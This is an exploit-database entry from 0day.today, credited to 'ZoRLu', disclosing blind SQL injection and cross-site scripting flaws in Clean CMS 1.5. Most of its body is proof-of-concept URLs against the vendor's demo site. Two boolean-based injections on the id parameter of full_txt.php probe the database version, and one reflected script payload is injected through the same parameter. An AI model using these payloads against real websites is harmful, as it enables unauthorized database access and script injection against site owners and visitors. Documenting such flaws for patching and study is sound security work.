Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities

2008-11-25T00:00:00
ID 1337DAY-ID-4254
Type zdt
Reporter ZoRLu
Modified 2008-11-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities
=======================================================================


[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.
[~]
[~] script: http://www.4yoursite.nl/script_clean_cms.php
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu  
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: RedHaK Kardesime ozel tesekurler.
[~] -----------------------------------------------------------

exp for demo:

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )

XSS for demo:

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script>


[~]----------------------------------------------------------------------



#  0day.today [2018-02-18]  #